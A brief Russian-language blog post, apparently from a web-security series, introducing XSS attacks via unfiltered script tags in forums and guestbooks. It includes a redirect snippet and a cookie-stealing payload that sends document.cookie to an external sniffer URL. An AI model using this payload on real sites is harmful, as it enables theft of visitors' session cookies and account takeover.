XSS

В предыдущем посту я упомянул о таких атаках как xss, sql_injection. Настало время вас познакомить с ними поближе и начну я, пожалуй, с xss. Я считаю что необязательно вам забивать голову как это расшифровывается и как переводится. Возможность проведения атаки заключается в том, что в каком-либо месте скрипта или веб-страницы (комментарии в гостевых книгах, сообщения на форумах) не фильтруется тег script , что может привести к выполнению произвольного кода, написанного на Java Script. Обычно с помощью xss крадут куки или ставят переадресацию на другой ресурс (например с целью получения дополнительного трафика). Пример переадресации:

window. location. href = "http://www.softtime.ru" 

где http://www.softtime.ru - адрес, куда происходит переадресация.
А вот и пример кражи кукисов: 

document. location = 'http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie 

где http://www.cgisecurity.com/cgi-bin/cookie.cgi? - адрес сниффера, в котором сохранятся куки.